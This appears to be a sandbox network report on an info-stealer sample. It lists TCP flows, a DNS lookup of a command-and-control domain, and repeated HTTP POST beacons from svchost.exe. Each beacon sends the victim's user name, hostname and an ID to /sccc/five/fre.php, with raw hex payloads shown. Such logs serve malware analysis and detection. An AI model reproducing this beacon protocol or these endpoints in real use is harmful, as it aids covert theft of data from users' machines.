Feb 25, 2025 05:26:05.371350050 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:05.372369051 CET	50038	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:05.377374887 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:06.007834911 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:06.007992983 CET	50038	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:06.008146048 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:06.008229971 CET	50038	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:06.013075113 CET	80	50038	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.163279057 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.168951988 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.169054985 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.171087027 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.176114082 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.176187038 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.181309938 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.938870907 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.939008951 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.939343929 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:07.939405918 CET	50039	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:07.944101095 CET	80	50039	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.104933023 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.110233068 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.110327959 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.112327099 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.117330074 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.117397070 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.122488976 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.847412109 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.848119020 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:09.848186970 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.905884981 CET	50040	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:09.911048889 CET	80	50040	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.267642975 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.274468899 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.274565935 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.276530981 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.283294916 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.284388065 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.289431095 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.935039997 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.935414076 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:11.935735941 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.935735941 CET	50041	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:11.940778971 CET	80	50041	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.073115110 CET	50042	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:13.078404903 CET	80	50042	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.078494072 CET	50042	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:13.080568075 CET	50042	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:13.086636066 CET	80	50042	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.086716890 CET	50042	80	192.168.2.5	104.21.96.1
Feb 25, 2025 05:26:13.091803074 CET	80	50042	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.795639038 CET	80	50042	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.795964956 CET	80	50042	104.21.96.1	192.168.2.5
Feb 25, 2025 05:26:13.796030998 CET	50042	80	192.168.2.5	104.21.96.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 05:24:11.024820089 CET	57844	53	192.168.2.5	1.1.1.1
Feb 25, 2025 05:24:11.054275036 CET	53	57844	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 25, 2025 05:24:11.024820089 CET	192.168.2.5	1.1.1.1	0xa181	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 25, 2025 05:24:11.054275036 CET	1.1.1.1	192.168.2.5	0xa181	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:11.094521999 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 180 Connection: close
Feb 25, 2025 05:24:11.100054026 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons320946ALFONS-PCk0FDD42EE188E931437F4FBE2CocojQ
Feb 25, 2025 05:24:11.820811033 CET	815	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:11 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7WPEo0%2FUF7VqgW9NtdKERK7cvjdkgCchBPS6hKtpf0K4DePbwQCZsK9ncTNkyCcDcUmFVs1AL5GgHOkrNgDMEP1j9benhD8Fk80TH5TZcKiOehZ2L5tP652fUI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ec9fda024375-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:13.060691118 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 180 Connection: close
Feb 25, 2025 05:24:13.065853119 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons320946ALFONS-PC+0FDD42EE188E931437F4FBE2CST5QP
Feb 25, 2025 05:24:13.815632105 CET	809	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7RS7%2FwqDNHC1FkDzkJVNuEnioVIYvok9396GYA16sDVH0BWxHQj16rnE6Ubou5p7s5vEXsBPvz6wnArA3Y738b5MV6kPR9QXoRM%2B331DIjp3zP7linKm1tx5HQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecac2e378c84-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:13.902112007 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:13.907229900 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:14.677139997 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IaHcPq1GsNMO0B1r92jD1zUfxzg2GfPBdCFviLvYsWTdquDNhuBzFeIMbayDrYKXaIF%2BqeDwqNzQZPV4SvN%2FCnb2fZ%2BnrwplTnFmXMMNpZIVrnAt402a5yh8BDg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecb16863f3bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=149&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:15.825815916 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:15.830902100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:16.568116903 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwkOLly5S5gtnbnmIp%2BWVJXpyr7CQK33dUV3Uc%2FTKpefMZ33KhwQECMtFDXUhAd5O%2BgBj%2BCGslKNrTTfc6pFevYT2afAem57ZjAszLpiPBSi0k%2FgpKWzaF8N2QY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecbd695341f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:17.727360010 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:17.732481003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:18.458218098 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:18 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6CHjgQIJJt60tfGGyShMyzdavc31WSNjsJxcOtIEqwZZ9aT0ljZ0YkP6v3gcFj8%2BCtkZKxB5h00o66v6O6Mv0PiGvjy9ZPAlLMepo4E8dMuljlVrHnQFQq9Chc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecc95f22440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:19.602703094 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:19.607816935 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:20.361226082 CET	849	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27TW8T95QCThKWxzIWW3b7WR5BcEYkQgX%2BDYgwL1Ewd5LV197brstu8iujlOl3hVpJF0kbl%2BAwLty%2BZCFoMk%2FAy57IXo%2BV%2FB3yCi7Zr%2FXP49pEtfaBuXFUGCwyo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecd4fb69159b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1854&rtt_var=927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:21.508479118 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:21.513552904 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:22.254756927 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H51BDEn%2BodbO1DdK%2B5ggRvLG8bjoSVCX5xyEi7oFrWhWojPVa848oRBKpgJAXTqecjV5j8bKuDpSCBhJ%2Fjp5bTAU0yeGXVQ8sr6g65BtFVS6E%2Be4r25qKilXPdc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ece0ee4b43ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:23.400933981 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:23.406014919 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:24.135411024 CET	828	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:24 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y9aU0DZx8cgTlkb%2BTFvr%2FYY7JP1QnOhZbLCJIiyy7E6j%2BJ%2Beg0I6oFg1HC%2BAuHEmChpapfILFF7%2BSe0ZgEKBCJsZoWSqFDfsldQX4T8doGxKoS1hPk2ykepO%2FwU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ececbf7d72a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1969&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49733	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:25.293277025 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:25.298458099 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:26.058486938 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:24:26 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQireqm%2FtklcEWQ9QNN%2BN%2FITVnJoNIZ9yYTNK7T27Q67NAINEHODMRrynBW6Zrr4no%2Fpwwhse%2FILHQJcaVwREUMoVABDyQjVLIrFGA9w8g14Xn4pNQMYrS4g3B0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ecf89a5b437e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49750	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:27.214498043 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:27.219618082 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:24:27.969352007 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:24:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPFVXYwlCnPShwEOqPhZIsYFxpEkEhELV2cAc14uXS4FBV%2BRK31ZcgVRTcR1EAwA%2BOB2v14ZxzP8UTJHqwBDYNsJVn0QWVcRkbbiFU8Vq1CX12pInBRoy0MpInI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ed049d734362-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49764	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:24:29.229752064 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:24:29.234934092 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
